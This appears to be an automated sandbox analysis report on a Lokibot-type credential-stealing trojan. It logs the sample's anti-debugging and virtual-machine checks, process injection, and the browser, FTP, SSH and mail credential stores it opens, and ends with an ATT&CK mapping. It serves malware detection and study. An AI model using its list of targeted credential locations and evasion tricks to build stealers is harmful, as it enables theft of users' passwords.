                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe TID: 5728Thread sleep time: -1320000s >= -30000s
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe TID: 5728Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: WerFault.exe, 00000008.00000003.292790829.00000000033A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                Source: WerFault.exe, 00000008.00000002.295732159.0000000003348000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                Source: WerFault.exe, 00000008.00000002.296545680.00000000051C7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmp, WerFault.exe, 00000008.00000002.296625095.00000000053E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess information queried: ProcessInformation

                Anti Debugging:

                barindex
                Contains functionality to hide a thread from the debuggerShow sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_0303B8B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0303C41F,00000000,00000000
                Hides threads from debuggersShow sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513935830.0000000001390000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00406069 GetUserNameW,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 2576, type: MEMORY
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: SmtpPassword
                Source: Yara matchFile source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804, type: MEMORY
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath InterceptionAccess Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery231Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Virtualization/Sandbox Evasion13Credentials in Registry2Virtualization/Sandbox Evasion13Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
